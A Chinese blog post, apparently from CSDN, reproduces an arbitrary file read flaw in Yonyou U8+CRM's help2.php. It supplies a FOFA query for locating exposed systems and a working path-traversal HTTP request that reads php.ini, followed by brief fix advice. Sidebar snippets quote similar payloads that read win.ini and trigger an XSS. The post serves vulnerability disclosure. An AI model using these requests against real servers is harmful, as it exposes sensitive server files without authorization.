用友U8+CRM help2 任意文件读取漏洞复现

已于 2023-12-22 23:08:02 修改
阅读量1.1k 收藏 12
点赞数 15
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-21 17:09:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135135305
版权

0x01 产品简介

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

用友 U8 CRM客户关系管理系统 help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。

0x03 复现环境

FOFA:title="用友U8CRM"

0x04 漏洞复现

PoC

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0xSecl
关注
  • 15
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友U8+CRM 任意文件上传+读取漏洞复现
0xSec
08-13 2449
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。
最新的用友U8+V16.0全产品报价单.xlsx
09-25
最新的用友U8+V16.0全产品报价单,这个是V16.0的版本,最新的用友U8+V16.0全产品报价单,这个是V16.0的版本,
C# 发送xml报文到用友U8生成凭证系列一(配置信息)
kongwei521的专栏
03-26 4261
C# 发送xml报文到用友U8生成凭证系列一(配置信息) C# 发送xml报文到用友U8生成凭证系列二(基础代码)C# 发送xml报文到用友U8生成凭证系列三(Modal代码) C# 发送xml报文到用友U8生成凭证系列四(Biz代码)最终代码在项目过程中,需要把平台上生成的凭证xml报文发送到用友U8中生成凭证,供财务好做账,因此就有此系列文章产生:本文将讲解前期准备工作。及要发送xml报文的格...
用友U8 CRM系统help2 任意文件读取漏洞(1day)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-20 561
U8+CRM》是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。软件立足代理销售服务行业管理一体化的高度,以“整合、专业、智能、畅捷”为产品研发理念,弥补了代理销售服务行业信息化管理的空白,为其经营管理的腾飞注入了强大的力量!技术平台采用JAVA跨平台BS应用开发技架构,支持 SQL Server数据库,支持Chrome、 Firefox等各种主流浏览器应用。
swfupload xss 注入修复
06-28
*swfUpload/Flash/swfupload.swf?movieName=aaa"])}catch(e){(alert)(1)};// *解决swfupload-xss注入,自己项目中遇到的,已经修改 亲测通过 *将文件中的swf文件替换掉项目中的swf文件 *将swfupload.as文件替换掉项目中的as文件 即可
Swfupload.swf 跨站脚本——漏洞复现
W小哥
12-18 3949
一、swfupload.swf简介 SWFUpload 是一款优秀的 Flash 上传控件,它可以非常好的增强 Web 端程序的用户上传体验。SWFUpload 自由灵活的 JavaScript 接口允许开发者自定义包括 HTML/CSS 在内的几乎所有 UI 样式,被广泛运用在大量站点的上传模块中,如 Youtube 和 WordPress 。 此漏洞可能导致严重的 XSS 安全隐患,但是官方一直没有修复。 二、漏洞复现 payload如下 http://XXX/images/swfupload/swfu
用友U8CRM系统help2 任意文件读取漏洞复现
fly夏天的博客
12-23 557
用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞,攻击者在未登录情况下即可进行漏洞利用。本文复现了这个漏洞并提供了进一步获取系统敏感文件的方法。
修复swfupload2.5版存在的XSS跨站攻击漏洞
10-08
修复swfupload2.5版存在的XSS跨站攻击漏洞,测试无错误版本。
SWFUpload php 2.2.0上传漏洞
weixin_33681778的博客
01-24 712
附图. 1 2 他没有验证是否登陆 直接上传成功. 点下一步是返回上传的图片路径. 3 他在这里验证了是否登陆后台. 我这里没登陆 所以提示 返回登陆页面. 4 上传成功. 文件名没有被重新命名. 直接利用II6解析成功获得权限 转载于:https://blog.51cto.com/obnus/484962...
用友U8+13.0数据字典.zip
08-26
用友U8 库表结构
用友U8+标准介绍.ppt
03-22
用友U8+标准介绍.ppt
用友U8+V12.0公共插件V7.5安装程序.rar
12-30
插件包含:宿舍管理,跨账套查询,固定资产条码,业务协调平台,运输管理 适用:用友U8v12.0
用友U8+13.0各模块操作手册文档
12-06
用友U8+13.0各模块操作手册文档,pdf格式的,适合实施人员,开发人员下载使用。包含生产管理,委外管理,自制加工等等,所有模块的操作手册
用友U8+CRM 任意文件读取漏洞复现
m0_69931798的博客
10-18 166
poc:burp 抓包 get 请求 GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini 替换即可。getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,本文 只复现 任意文件读取。body="用友U8CRM"
概念解析 | 威胁建模与DREAD评估:构建安全的系统防线
NLOS的博客
05-05 360
在信息安全领域,威胁建模就像是一位睿智的军师,他审时度势,为系统安全布局。这位军师会仔细分析系统的架构,找出其中潜在的薄弱环节,预判可能出现的安全威胁。他会问自己这样的问题:“如果我是敌人,我会从哪里发起进攻?我的目标是什么?我会利用系统的哪些漏洞?通过这样的分析,威胁建模可以帮助我们更全面、更系统地评估系统面临的安全风险,找出最需要防范的威胁,并有针对性地制定防御策略。这就像是在城墙上加固门禁,在易受攻击的地方布置更多的守卫。
CNCERT:关于汽车数据处理4项安全要求检测情况的通报 (第一批)
南七小僧的学海无涯
04-30 1295
本次检测根据《汽车数据安全管理若干规定(试行)》有关要求,按照GB/T 41871-2022《信息安全技术 汽车数据处理安全要求》和T/CAAMTB 77-2022《汽车传输视频及图像脱敏技术要求与方法》相关技术标准,并参考《汽车数据通用要求(报批稿)》附录C组织实施。检测采用相同的测试要求、测试环境、技术标准和测试流程,包括车外人脸信息等匿名化处理、默认不收集座舱数据、座舱数据车内处理以及处理个人信息显著告知4项要求。e.查阅、复制其个人信息以及删除车内、请求删除已经提供给车外的个人信息的方式和途径;
【Ping32】-企业级加密软件,让核心机密更安全
最新发布
2201_75471311的博客
05-06 213
总之,Ping32作为一款企业级加密软件,以其卓越的性能和强大的功能,为企业提供了全方位的核心机密保护。它采用先进的加密技术,结合丰富的管理功能、审计和日志功能以及高度的灵活性和可扩展性,确保了企业核心机密的安全。Ping32,作为一款企业级加密软件,以其卓越的性能和强大的功能,致力于保护企业的核心机密安全。在当今这个信息化时代,企业的机密信息往往成为不法分子觊觎的目标,因此,如何确保核心机密的安全成为每个企业都必须面对的问题。Ping32采用先进的加密技术,对企业的核心机密进行全方位的保护。
有什么内网安全管理软件,内网防护需要哪些安全软件?
2201_75471311的博客
05-06 310
Ping32是一款全面的终端安全管理软件,具有终端安全、数据安全、行为审计等多项功能。它可以对企业内部的所有终端进行全面管理,有效防止终端被攻击和感染病毒。同时,Ping32还可以对企业内部的数据进行加密保护,确保数据的机密性和完整性。此外,Ping32还具有行为审计功能,可以记录终端的操作行为,方便企业进行安全事件的追溯和分析。
用友U8+应收核销明细表
02-23
用友U8+是一款企业管理软件,其中包含了应收核销明细表功能。应收核销明细表是用于记录企业在销售过程中的应收账款核销情况的报表。 在用友U8+中,可以通过以下步骤来使用应收核销明细表功能: 1. 登录用友U8+系统,进入财务管理模块。 2. 在财务管理模块中,找到并点击“应收管理”或类似的菜单项。 3. 在应收管理菜单中,选择“应收核销明细表”或类似的选项。 4. 进入应收核销明细表页面后,可以根据需要设置查询条件,如日期范围、客户名称等。 5. 点击查询按钮,系统将根据设置的条件查询并显示符合条件的应收核销明细数据。 6. 在应收核销明细表中,可以查看每笔核销的详细信息,包括核销日期、核销金额、客户名称、销售订单号等。 7. 可以根据需要导出或打印应收核销明细表,以便进行进一步的分析和处理。 使用用友U8+的应收核销明细表功能,可以方便地跟踪和管理企业的应收账款核销情况,帮助企业实现更好的财务管理和控制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值